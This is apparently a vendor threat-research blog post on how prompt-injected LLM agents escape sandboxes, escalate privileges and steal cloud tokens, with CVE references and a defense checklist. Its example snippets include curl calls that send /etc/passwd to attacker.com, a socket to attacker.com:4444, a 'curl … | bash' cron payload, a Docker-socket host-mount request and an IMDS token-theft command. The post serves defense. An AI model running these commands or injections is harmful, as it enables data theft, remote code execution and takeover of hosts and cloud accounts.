Threat research

LLM Sandbox Escapes: How AI Agents Break Out of Containment

From unsandboxed Python execution disguised as isolation, to Docker socket privilege escalation, to managed identity token theft from cloud MCP servers, sandbox escapes in LLM agents are well-documented and growing. Here are the six attack families, the CVEs that prove them real, and the defense architecture that stops them.

Alec Burrell· Founder, Context Guard Published 25 June 2026 16 min read
LLM Sandbox Escapes: How AI Agents Break Out of Containment

When you give an LLM agent a sandbox, you assume it stays inside. But real-world CVEs and academic research in 2026 show that sandboxes designed for code execution, tool access, and API boundaries are being broken out of routinely. From unsandboxed Python execution disguised as isolation, to Docker socket privilege escalation, to managed identity token theft from cloud MCP servers, the escape routes are numerous and well-documented. Here is the full map of sandbox escape and privilege escalation attacks against LLM agents, the CVEs that prove them real, and the defense architecture that actually contains them.

Why sandbox escapes matter now

LLM agents in 2026 do not just generate text. They execute code, browse the web, call APIs, read and write files, manage cloud resources, and orchestrate multi-step workflows. Every one of those capabilities is a sandbox boundary, and every sandbox boundary is an attack surface.

The assumption behind agent sandboxes is simple: the agent operates within defined permissions, and if it tries to exceed them, the boundary holds. But three converging trends make that assumption dangerously fragile:

  • Agents have more powerful tools. Code execution environments, shell access, file system operations, and cloud API integrations give agents capabilities that were server-side only two years ago.
  • Sandbox implementations are inconsistent. Some agents run in Docker containers, some in VMs, some in bare Python processes with a flag that sounds like security but is not, and some with no isolation at all.
  • Prompt injection reaches the sandbox. An attacker does not need to exploit a kernel vulnerability. They inject instructions that convince the agent to use its legitimate tools in illegitimate ways, and the sandbox does not distinguish between the agent's intent and the attacker's.

The result: a growing category of attacks where the LLM's tools become the escape route. Context Guard now tracks 27 detection rules across sandbox escapes, privilege escalation, RCE, and authentication bypass, and the CVE database behind them is expanding every week.

The trust model that breaks

Most agent deployments assume a three-layer trust model:

  1. The system prompt defines what the agent should do.
  2. The tool permissions define what the agent can do.
  3. The sandbox boundary contains what the agent actually does.

Prompt injection destroys layer one. Tool abuse attacks layer two. Sandbox escapes destroy layer three. When all three are compromised, the attacker has full control of the host system, the cloud environment, or both.

The critical insight is this: sandbox escapes in LLM agents rarely involve exploiting a hypervisor or container breakout in the traditional sense. Instead, the agent is instructed to use its legitimate access in ways that were not anticipated. The sandbox is bypassed, not broken.

Six sandbox escape and privilege escalation families

1. Unsandboxed code execution

The most direct escape: the agent runs code with no effective isolation. The most prominent 2026 example is the DeepSeek python_exec vulnerability, where python -I (isolated mode) was treated as a security boundary for executing LLM-generated code. The -I flag only disables user site-packages and environment variables. It does not restrict os.system, subprocess, file I/O, network access, or any other dangerous operation.

python
# The "sandbox" that isn't:
# python -I only disables site-packages and env vars.
# It does NOT prevent:
import os
os.system("curl https://attacker.com/exfil?data=$(cat /etc/passwd)")

import subprocess
subprocess.Popen(["bash", "-c", "reverse_shell_here"])

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacker.com", 4444))

# None of these are blocked by python -I

Context Guard's python_exec_no_sandbox rule (critical severity, OWASP LLM06) detects attempts to execute unsandboxed Python, including patterns that reference os.system, subprocess, socket.connect, and ctypes within agent contexts. It also catches the misconception that python -I provides security, detecting language that claims isolation where none exists.

Detection: The rule uses a negative lookahead to exclude defensive patterns (recommendations to use Pyodide, WASM, firejail, or seccomp), ensuring it flags actual attacks and not security guidance.

2. Docker and container privilege escalation

Many agent frameworks run inside Docker containers for isolation. But Docker-in-Docker and Docker socket exposure create a path from container to host. The Docker socket privilege escalation rule (docker_socket_privilege_escalation, critical severity) detects attempts where an agent accesses the Docker socket to escalate from container to host.

text
# Agent instructed to mount the Docker socket:
docker run -v /var/run/docker.sock:/var/run/docker.sock ...

# Or directly via the socket:
curl --unix-socket /var/run/docker.sock \
  http://localhost/containers/create \
  -d '{"Image":"alpine","Cmd":["cat","/etc/host_shadow"],"HostConfig":{"Binds":["/:/host"]}}'

# The agent now has root on the host machine.

Related attacks include the sandbox_escape_http_handler rule (critical severity), which catches VM sandbox escape via HTTP handler code injection, as demonstrated in GHSA-6vr3-7wcx-v5g5 (browserstack-runner). The attacker injects code through an HTTP request handler that runs inside the VM sandbox, achieving arbitrary system command execution from within the containment boundary.

Other container escapes detected include shell_expansion_sandbox_bypass (shell metacharacter expansion that bypasses sandbox restrictions), sandbox_escape_http_handler (HTTP handler code injection inside VM sandboxes), and the agent sandbox symlink path traversal rule (agent_sandbox_symlink_path_traversal), which detects symlink-based escapes from agent file system sandboxes.

3. RCE through LLM tool invocation

Remote code execution through LLM-powered tools is one of the fastest-growing attack categories in 2026. The attacker does not need shell access. They need to convince the agent to execute code on their behalf.

The attack patterns are diverse and well-documented:

  • YAML config injection for RCE (rce_yaml_config_injection, critical): CVE-2026-47722 (nebula-mesh), CVE-2026-48030 (Pheditor), and CVE-2026-49396 (Nezha) show that injecting YAML or config values can achieve command execution when the agent or orchestration layer parses them.
  • Go template injection for RCE (rce_go_template_injection, critical): CVE-2026-48787 (gin-vue-admin) demonstrates that Go template injection allows os.Create, exec.Command, and other dangerous operations through template expressions.
  • MCP code generation RCE (mcp_code_gen_rce, critical): MCP tool invocation that triggers code generation or command execution with attacker-controlled input, as seen in CVE-2026-48787 and CVE-2026-56274.
  • Stored cron command execution (rce_stored_cron_trigger, critical): CVE-2026-49396 (Nezha) shows GET requests triggering stored cron commands on monitoring agents, enabling RCE via crafted URLs visited by authenticated admins.
yaml
# YAML injection leading to RCE (CVE-2026-49396):
# Nezha monitoring agent stored cron command
monitor:
  cron: "*/1 * * * *"
  command: "curl https://attacker.com/payload | bash"
  # A crafted URL visit triggers this stored command

The pattern is consistent: the LLM agent is given a tool (code execution, config editing, cron management) and an attacker-controlled input convinces it to use that tool in a dangerous way. The sandbox boundary is bypassed because the tool itself is the escape route.

4. Authentication bypass and identity hijacking

Authentication bypass attacks do not escape a sandbox in the traditional sense. They bypass the trust boundary that defines who the agent is and what it can access. If an attacker can forge or bypass authentication, the sandbox permissions become meaningless.

The 2026 threat landscape includes several critical patterns:

  • LLM proxy authentication bypass (ab_llm_proxy_auth_bypass, critical): CVE-2026-49312 (LiteLLM proxy) shows proxies accepting expired API keys without upstream verification, and CVE-2026-43971 shows MCP OAuth session fixation allowing cross-user request forgery.
  • Hardcoded JWT secrets (ab_hardcoded_jwt_secret, critical): GHSA-3qg8-5g3r-79v5 (PraisonAI) demonstrates platforms using hardcoded development secrets that allow token forgery when security checks are bypassed in default configurations.
  • Host header injection auth bypass (auth_bypass_host_header_injection, critical): CVE-2026-49468 shows Starlette/FastAPI URL reconstruction vulnerability where crafted Host headers bypass auth middleware on management routes.
  • Cross-tenant WebSocket hijacking (ab_cross_tenant_websocket_hijack, high): CVE-2026-54324 (Daytona) shows shared WebSocket subscriptions with improper tenant isolation, allowing session hijacking across tenants.
  • Organization invitation bypass (ab_unverified_identity_invitation, medium): CVE-2026-54320 (Daytona) shows accepting org invitations with unverified identity, gaining unauthorized access through email matching without verification.
text
# Host header injection bypass (CVE-2026-49468):
# Craft a request with a Host header that makes the auth
# middleware evaluate a different route than the dispatched path:
GET /admin/monitor HTTP/1.1
Host: management.internal.corp
Authorization: Bearer <valid-user-token>
# Auth middleware checks management.internal.corp/auth
# which has different (or no) auth requirements than
# the actual dispatched admin/monitor route

When authentication is bypassed at the proxy or middleware level, the agent's sandbox permissions are irrelevant. The attacker becomes a privileged user and accesses resources the agent was supposed to protect.

5. Privilege escalation through ACL and sync APIs

Privilege escalation in LLM agent contexts typically involves manipulating role-based access control or integration APIs to gain higher permissions than intended. Three key patterns emerge from the 2026 data:

  • RBAC team manipulation (rbac_team_escalation, high): GHSA-c3qp-2ggw-xjg7 (Shopper) shows manipulating team settings or role assignment APIs to gain admin access. An attacker who can influence an LLM agent that has access to RBAC APIs can instruct it to escalate its own role.
  • ACL admin creation (privilege_escalation_acl_admin, high): GHSA-v39m-97p8-gqg7 (Shopware) shows creating admin accounts through non-admin ACL or integration API endpoints. The agent does not need to exploit a vulnerability in the RBAC system itself. It just needs to call an API endpoint that should be restricted but is not.
  • Sync API admin flag bypass (privilege_escalation_sync_admin, high): GHSA-gv8p-48fr-4fxg (Shopware) shows manipulating admin flags in sync or integration APIs. When the LLM agent has access to a sync endpoint that accepts user profile updates including role flags, an injection can set the admin flag.
text
# Privilege escalation via sync API (GHSA-gv8p-48fr-4fxg):
# Agent instructed to call the user sync endpoint with an admin flag:
POST /api/v1/sync/users
{
  "email": "attacker@company.com",
  "role": "admin",
  "isAdmin": true
}
# The sync API accepts the admin flag without verifying
# the calling user has permission to set it.

6. Cloud managed identity token theft

One of the most sophisticated escape routes in 2026 targets cloud-hosted MCP servers. The mcp_managed_identity_trust_gap rule (critical severity) addresses a fundamental trust gap in how cloud platforms handle identity for LLM agents.

Cloud-hosted MCP servers authenticate to cloud resources using platform-managed identity tokens. These tokens are cryptographically valid but lack behavioral attestation. After a host compromise (such as CVE-2026-47281, a VS Code elevation of privilege vulnerability), attackers can steal managed identity tokens from IMDS endpoints (169.254.169.254 on Azure, the metadata service on AWS/GCP) and use them to access cloud resources without additional credentials.

text
# Managed identity token theft from a compromised MCP server:
# After host compromise (CVE-2026-47281):
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net"

# Response contains a valid access token for Key Vault:
{
  "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs...",
  "expires_on": "1735689600",
  "resource": "https://vault.azure.net",
  "token_type": "Bearer"
}

# Attacker now has Key Vault access without any credentials.
# The token is cryptographically valid, so cloud services accept it.
# There is no behavioral attestation - the token cannot distinguish
# between the legitimate MCP server and the attacker who stole it.

The MCP specification itself has a security gap here: it assumes that managed identity tokens are sufficient for authentication, but does not require behavioral attestation to prove the token holder is the intended service. This means the trust boundary between the MCP server and the cloud resource is defined entirely by the token, and tokens can be stolen.

Path traversal: the unseen escape route

Path traversal attacks are the quiet cousin of sandbox escapes. They do not execute code or bypass authentication. They simply read or write files outside the intended directory, which in an agent context can be just as damaging.

Context Guard tracks six path traversal detection rules across HTTP servers, database sources, and AI frameworks. Key patterns include:

  • HTTP server path traversal (path_traversal_http_server, high): GHSA-8rpw-6cqh-2v9h (browserstack-runner) showed unauthenticated file reads via path traversal through HTTP servers.
  • AI framework traversal (pt_ai_framework_traversal, high): AI agent frameworks that construct file paths from user input without sanitization, allowing ../ sequences to escape the working directory.
  • Package path traversal (pt_package_path_traversal, high): Path traversal through package or module resolution that allows reading files outside the package directory.
  • Wheel write override (pt_wheel_write_override, high): Overwriting Python wheel files during installation to inject malicious code.

In an agent context, path traversal is particularly dangerous because the agent has file system tools that it is expected to use. An injection that tells the agent to read /etc/passwd or ../.env is using the agent's legitimate capabilities in an illegitimate way. The sandbox boundary is the file system, and the path traversal is the escape.

Why sandbox hardening is not enough

The natural response to sandbox escapes is to harden the sandbox: better containers, stricter permissions, more isolation. This is necessary but insufficient for three reasons:

  • Agents need their tools. You cannot run a code assistant without code execution. You cannot run a cloud management agent without API access. You cannot run a file manager without file system access. The tools that make agents useful are the same tools attackers exploit.
  • Sandbox boundaries are trust boundaries. Authentication bypass attacks show that if you can break the trust boundary (who the agent is), the sandbox boundary (what the agent can do) becomes irrelevant. A forged identity with admin permissions does not need to escape the sandbox.
  • Container escapes keep appearing. Docker socket exposure, VM HTTP handler injection, and symlink traversal are not theoretical. They are documented CVEs with real exploits. Hardening one escape route does not prevent the next one from being discovered.

The solution is not just harder sandboxes. It is detection and intervention at the LLM layer, before the agent uses its tools in a dangerous way.

Defense architecture for sandbox escape prevention

Effective defense against sandbox escapes and privilege escalation requires controls at every layer of the agent stack.

1. Input detection before the agent

Every untrusted input that reaches the agent should pass through a detection pipeline. This includes user messages, retrieved content, tool responses, and any data the agent did not generate itself. Context Guard's 953 detection rules cover all six escape families documented in this post, plus 20 more attack categories.

Key rules for sandbox escape prevention:

  • python_exec_no_sandbox (critical) catches unsandboxed Python execution attempts
  • docker_socket_privilege_escalation (critical) detects Docker socket access patterns
  • sandbox_escape_http_handler (critical) catches HTTP handler code injection inside VM sandboxes
  • rce_yaml_config_injection (critical) detects YAML injection leading to command execution
  • rce_go_template_injection (critical) catches Go template injection for RCE
  • ab_llm_proxy_auth_bypass (critical) detects authentication bypass patterns at LLM proxies
  • ab_hardcoded_jwt_secret (critical) catches JWT forgery via hardcoded secrets
  • mcp_managed_identity_trust_gap (critical) detects managed identity token theft attempts

2. Tool call interception

Detection at the input layer is necessary but not sufficient. Some attacks only become visible when the agent tries to use a tool. An LLM proxy like Context Guard sits between the agent and its tools, inspecting every tool call for dangerous patterns before it reaches the backend.

For sandbox escape prevention, the proxy should:

  • Block dangerous tool arguments: Detect docker.sock mounts, /var/run/docker.sock paths, subprocess calls, and os.system invocations in tool arguments.
  • Flag privilege escalation patterns: Detect API calls that modify RBAC settings, create admin accounts, or escalate permissions beyond the agent's intended role.
  • Intercept authentication bypass attempts: Detect Host header manipulation, OAuth session fixation, and JWT forgery patterns in tool arguments.
  • Monitor path traversal: Detect ../ sequences, symlink creation, and file system access outside the agent's designated working directory.

3. Actual sandboxing (not flags)

If your agent executes code, use a real sandbox. Not python -I. Not a stripped-down environment variable. Not "we trust the model." Real sandboxing means:

  • gVisor or Firecracker microVMs for code execution with actual kernel-level isolation
  • Seccomp profiles that whitelist only the system calls the agent needs
  • Network policies that restrict egress to only required services
  • Read-only file systems except for designated writable directories
  • No Docker socket access, ever, from within an agent container
The difference between a flag and a sandbox: python -I disables user site-packages and environment variables. It does not prevent os.system(), subprocess, socket, ctypes, or file I/O. If you are running LLM-generated code, use Pyodide (WASM-based), gVisor, or Firecracker. The -I flag is not a sandbox.

4. Authentication hardening

Every authentication boundary in the agent stack needs hardening:

  • No hardcoded JWT secrets. Ever. Use environment-specific secrets with rotation.
  • Verify every token upstream. LLM proxies must validate tokens with the identity provider, not just check for presence and expiry.
  • Tenant isolation on WebSocket and notification channels. CVE-2026-54324 shows what happens when you skip this.
  • Host header validation at every proxy layer. CVE-2026-49468 shows the impact when you skip this.
  • Managed identity behavioral attestation for cloud-hosted MCP servers. Tokens alone are not enough.

5. Behavioral monitoring and anomaly detection

Even with input detection, tool interception, real sandboxing, and auth hardening, you need behavioral monitoring. Some escapes are subtle: an agent that suddenly accesses a file it has never accessed before, or calls an API it has never called, or escalates its own permissions. These behaviors are the signatures of an escape in progress.

Context Guard's risk scoring engine provides exactly this: composite risk scores (0.0-1.0) that factor in the full conversation context, not just individual message patterns. An agent that gradually escalates its behavior over multiple turns will be caught by the aggregate risk score even if each individual action looks benign.

How Context Guard helps

Context Guard is a reverse proxy for OpenAI and Anthropic APIs with a policy engine that inspects every request and response in real time. For sandbox escape and privilege escalation prevention, it provides:

  • 953 detection rules across 26 attack categories, including all the sandbox escape, RCE, privilege escalation, and authentication bypass patterns documented in this post
  • Hot-reload YAML configuration so new threat intelligence is deployed without downtime
  • Composite risk scoring (0.0-1.0) that evaluates the full conversation context, not just individual messages
  • Triage dashboard for human review of flagged requests, with full conversation context
  • Webhook, email, and Slack alerting for real-time notification of critical threats

Every CVE and GHSA referenced in this post has corresponding detection rules in Context Guard. The rules are mapped to OWASP LLM categories and are hot-reloadable, so new threats are added as they are discovered without redeploying your proxy.

If you are running LLM agents with code execution, tool access, or cloud API integrations, try Context Guard free to see what your agents are actually doing.

Sandbox escape defense checklist

  • Agent code execution runs in real sandboxing (gVisor, Firecracker, or WASM), not python -I
  • Docker socket is never mounted inside agent containers
  • Agent tool permissions follow least-privilege (no admin APIs unless required)
  • JWT secrets are environment-specific and rotated, never hardcoded
  • LLM proxy validates tokens upstream with the identity provider
  • WebSocket and notification channels enforce tenant isolation
  • Host header validation at every proxy layer
  • Managed identity tokens include behavioral attestation for cloud MCP servers
  • File system access is restricted to designated directories, with path traversal detection
  • Agent behavioral monitoring detects permission escalation anomalies
  • Input detection pipeline runs before every agent request
  • Tool call interception blocks dangerous arguments before they reach backends
  • YAML and template inputs are sanitized before parsing
  • Cron and scheduled tasks cannot be injected via agent inputs
sandbox escapeprivilege escalationRCEauthentication bypassOWASP LLM06MCP securityagent securitycode execution

Ready to defend your LLM stack?

Context Guard is the drop-in proxy that detects prompt injection, context poisoning, and data exfiltration in real time - mapped to OWASP LLM Top 10. Try it on your own traffic with a 14-day free trial, no credit card.

  • < 30 ms p50 inline overhead
  • Works with OpenAI, Anthropic, and any compatible upstream
  • Triage console + structured webhooks

Related posts

All posts →
Threat research

LLM Code Execution Attacks: How Sandbox Escapes Turn AI Assistants Into Attack Platforms

Sandbox escapes, pickle deserialization RCE, trust_remote_code execution, MCP server command injection, and self-propagating agent worms are the five code execution attack classes we see in production. Backed by CVEs, GitHub advisories, and published research, here is the full threat map and the defense architecture that stops your AI assistant from becoming an attack platform.

7 June 2026Read
Threat research

LLM Tool Abuse Attacks: Shell Injection, SSRF, Credential Theft, and 252 Other Ways Your Agent Can Be Turned Against You

AI agents call tools on your behalf. When an attacker controls the arguments, the agent becomes a weapon aimed at your infrastructure. Tool abuse is the largest attack category in production LLM deployments with 252 detection rules covering shell injection, SQL injection, path traversal, SSRF, credential harvesting, sandbox escapes, MCP exploitation, deserialization RCE, and mass assignment. Here are the nine attack families, the real payloads, and the four-layer defense architecture that stops tool-call attacks before they execute.

4 July 2026Read
Threat research

Agentic Web Attacks: How Attackers Exploit AI Browsers That Browse the Internet

AI agents that browse the web are under active attack. Hidden instructions in web pages, browser manipulation, UI deception, credential harvesting, data exfiltration through forms, and MCP tool hijacking are six attack classes that exploit the trust agents place in web content. Backed by the WAAA research and production attack patterns, here is the full threat map and the five-layer defense architecture.

13 June 2026Read